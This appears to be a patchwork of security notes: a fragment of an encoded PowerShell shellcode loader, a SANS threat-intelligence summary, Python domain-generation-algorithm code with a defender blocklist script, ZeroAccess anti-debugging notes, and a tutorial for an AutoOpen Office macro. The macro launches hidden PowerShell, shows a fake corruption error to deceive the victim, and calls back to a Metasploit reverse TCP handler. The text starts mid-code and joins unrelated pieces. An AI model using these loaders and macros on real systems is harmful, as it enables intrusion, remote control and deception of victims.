1)};$w::CreateThread(0,0,$NNL,0,0,0);for (;;){Start-sleep 60};';$e = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($mcBY));$03F = "-EncodedCommand ";if([IntPtr]::Size -eq 8){$914J = $env:SystemRoot + "\syswow64\WindowsPowerShell\v1.0\powershell";iex "& $914J $03F $e"}else{;iex "& powershell $03F $e";}

III. Priv Esc Exploit CVE-2014-4113 (ms14_058_track_popup_menu):

SANS: Who’s Using Cyberthreat Intelligence and How?

“Who’s Using Cyberthreat Intelligence and How?” By Dave Shackleford 


[Source: http://www.sans.org/reading-room/whitepapers/analyst/cyberthreat-intelligence-how-35767]


Outline:
Threat Intelligence – the set of data collected, assessed and applied regarding security threats, threat actors, exploits, malware, vulnerabilities and compromise indicators

Purpose of CTI:
• Ability to see attacks in context
• Accuracy of detection and response
• Faster detection and response 

Data Collection Points:
“In addition to the 59% stating they are gathering intelligence from their internal systems, 76% of respondents say their organizations are gathering intelligence from the security community at large.

The external sources they are gathering information from include:
• 56% gather intelligence from their vendor product’s CTI feeds
• 54% gather intelligence from their public CTI feeds
• 53% gather intelligence from open source feeds

A small number of answers in the “Other” category included private feeds for government agencies and law enforcement, as well as social media and sites such as the SANS Internet Storm Center (ISC). “

Intelligence Feeds
“We asked those who selected “vendor-driven CTI feeds” what types of vendors were providing these. The range of responses was very broad, and many teams are obviously using CTI data from a number of different types of vendors. Endpoint security vendors led with 51%, but 43% of respondents are also getting CTI information from unified threat management (UTM)/firewall/IDS vendors and 40% from CTI platform vendors, vulnerability management providers and SIEM vendors. “

Planning for CTI
Organizations planning to invest in CTI feeds, tools and internal capabilities should assess their readiness for using CTI now and in the future.

1. Decide what you intend to do with CTI data and whom you will assign to CTI planning duties. Most organizations that attempt to implement CTI ad hoc, with no budget, staff, tools or goals, tend to reap minimal rewards.

2. Focus on tools and feeds. Once you’ve decided what you plan to do with CTI (improve detection capabilities, add more granular correlation rules to your SIEM, add host-based forensics indicators, etc.), focus on two areas: What kinds of tools will you use to aggregate and collect CTI data? And will you use commercial feeds, open source and community data, or both? Many SIEM providers are now integrating CTI feeds and information readily. Be sure to look at standard import data formats if you are bringing in feeds.

3. Consider your goals. Once you’ve decided on the basics of what data you want and where it will be aggregated, think about the short- and long-term goals of the program and how you’ll measure progress. 

CTI Standards and Tools
CVE and CVSS
• Open Threat Exchange (OTX)—51%
• Structured Threat Information Expression (STIX)—46%
• Collective Intelligence Framework (CIF)—39%
• Open Indicators of Compromise (OpenIOC) framework—33%
• Trusted Automated eXchange of Indicator Information (TAXII)—33%
• Traffic Light Protocol (TLP)—28%
• Cyber Observable eXpression (CybOX)—26%
• Incident Object Description and Exchange Format (IODEF)—23%
• Vocabulary for Event Recording and Incident Sharing (VERIS)—20%

Domain Generation Algorithm (DGA): Ways to Communicate

# Domain Generation Algorithm (DGA): Python Implementation 

Ways to disseminate the DGA seed:
(1) Spread it inside the bot config (easy but insecure);
(2) Generate it from the local environment, e.g. GetSystemInfo, GetCurrentUser, etc. (more secure);
(3) Pull additional websites out of the seed websites’ HTML source code. Example:

ROEbG92ZXJhaW4ueHl6ROE

# ROE is a marker for Base64-encoded loverain.xyz

1.
# -*- coding: utf-8 -*-
import hashlib

def md5_dga(seed):
    var = hashlib.md5()  # hash the seed using the entry algorithm
    var.update(seed.encode("utf-8"))
    name = var.hexdigest()  # cut all the strings after the 10th one
    part = name[:10]
    return "{}.xyz".format(part)

seed = "cm9jayduJ3JvbGw="  # ASCII: rock'n'roll
for x in range(12):
    seed = md5_dga(seed)  # each round feeds the previous domain back in as the new seed

print(seed)

2.
# -*- coding: utf-8 -*-
dga_dictionary = ['btc', 'love', 'bit', 'rain', 'drop']

def dictionary_dga(seed):
    ln = len(dga_dictionary)  # check the maximum length of the DGA dictionary
    if ln * ln <= seed:
        return False  # only ln*ln two-word combinations exist
    # choose 2 words
    first = seed // ln
    last = seed % ln
    # create an address concatenating variable 1 + variable 2
    addr = "{}{}.xyz".format(dga_dictionary[first], dga_dictionary[last])
    return addr

for x in range(20):
    print(dictionary_dga(x))
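The defender's use of the same three mechanisms, added here as an example and not code from the original notes: replay the md5 DGA keeping every round's domain rather than only the last, enumerate all ln*ln dictionary domains, decode ROE-delimited markers from a seed site's HTML (way 3), and match the union against DNS log lines. The dictionary, seed and marker string are the page's; the HTML snippet and log lines are constructed.

```python
import base64
import hashlib
import re

# Inputs from the page (dictionary, seed, ROE marker) plus a constructed HTML snippet.
DGA_DICTIONARY = ["btc", "love", "bit", "rain", "drop"]
SEED = "cm9jayduJ3JvbGw="
MARKED_HTML = '<html><!-- ROEbG92ZXJhaW4ueHl6ROE --><body><p>nothing to see</p></body></html>'
MARKER_RE = re.compile(r"ROE([A-Za-z0-9+/=]+?)ROE")  # non-greedy so two markers never merge

def md5_dga_chain(seed, rounds):
    """Replay the page's md5 DGA, returning every round's domain (all are candidate C2 names)."""
    domains = []
    for _ in range(rounds):
        seed = hashlib.md5(seed.encode("utf-8")).hexdigest()[:10] + ".xyz"
        domains.append(seed)
    return domains

def dictionary_dga_all(dictionary):
    """Enumerate every domain the dictionary DGA can emit: ln*ln two-word combinations."""
    n = len(dictionary)
    return ["{}{}.xyz".format(dictionary[i // n], dictionary[i % n]) for i in range(n * n)]

def extract_marked_domains(html):
    """Decode the ROE<base64>ROE tokens a bot would pull from a seed site (way 3)."""
    found = []
    for token in MARKER_RE.findall(html):
        try:
            found.append(base64.b64decode(token, validate=True).decode("ascii"))
        except (ValueError, UnicodeDecodeError):
            continue  # malformed marker, ignore it
    return found

def build_blocklist(seed, rounds, dictionary, html):
    """Union of everything the three mechanisms can produce, for sinkholing or log matching."""
    return (set(md5_dga_chain(seed, rounds))
            | set(dictionary_dga_all(dictionary))
            | set(extract_marked_domains(html)))

def match_dns_log(lines, blocklist):
    """Return (client, domain) pairs from 'client domain' log lines that hit the blocklist."""
    hits = []
    for line in lines:
        client, _, domain = line.strip().partition(" ")
        if domain.lower() in blocklist:
            hits.append((client, domain.lower()))
    return hits

if __name__ == "__main__":
    bl = build_blocklist(SEED, 12, DGA_DICTIONARY, MARKED_HTML)
    log = ["10.0.0.5 loverain.xyz", "10.0.0.7 example.com", "10.0.0.5 " + md5_dga_chain(SEED, 3)[-1]]
    print(match_dns_log(log, bl))
```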


Dissecting ZeroAccess: Int 2d Anti-Debugging Technique

Source: fumalwareanalysis.blogspot.com

Learning Goals:

  • Understand the general interrupt handling mechanism on x86 platform;
  • Understand the byte scission anti-debugging technique; and,
  • Know how to use a binary debugger to patch an executable program

The general anti-debugging techniques are as follows:
(1) to detect the existence of a debugger, and behave differently when a debugger is attached to the current process; and,
(2) to disrupt or crash a debugger.

The instruction we are trying to analyze is the “INT 2D” instruction located at 0x00413BD5 (as shown in Figure 1). By single-stepping the malware, you might notice that the program’s entry point is 0x00413BC8. After the execution of the first 8 instructions, right before the “INT 2D” instruction, the value of EAX is 0x1. This is an important fact you should remember in the later analysis.

Docm Macro Beacon Loader: From Cybercriminal Perspective

Goal:

  • Simulate an advanced adversary using macros with .docm documents and PowerShell to create a beacon-type payload using unicorn.py (thanks to TrustedSec!)
  • It is similar to Locky, Cerber, Carbanak payloads minus PowerShell

For the macro attack, you will need to go to File, Properties, Ribbons, and select Developer. Once you do that, you will have a Developer tab. Create a new macro, call it AutoOpen and paste the generated code into it. This will run automatically. Note that a message will be displayed to the user saying that the file is corrupt, and the Excel document will then close automatically. THIS IS NORMAL BEHAVIOR! This tricks the victim into thinking the Excel document is corrupted. You should get a shell through PowerShell injection after that.

The full macro script is as follows:

Sub AutoOpen()
Dim x
x = "-window hidden -EncodedCommand " "
Shell ("powershell.exe " & x)
Dim title As String
title = "Critical Microsoft Office Error"
Dim msg As String
Dim intResponse As Integer
msg = "This document appears to be corrupt or missing critical rows in order to restore. Please restore this file from a backup."
intResponse = MsgBox(msg, 16, title)
Application.Quit
End Sub


Attacker’s View:

  • msfconsole -r unicorn.rb
  • [*] Exploit running as background job.
  • [*] Started reverse TCP handler on 192.168.0.196:443 
  • [*] Starting the payload handler…
  • [*] Encoded stage with x86/shikata_ga_nai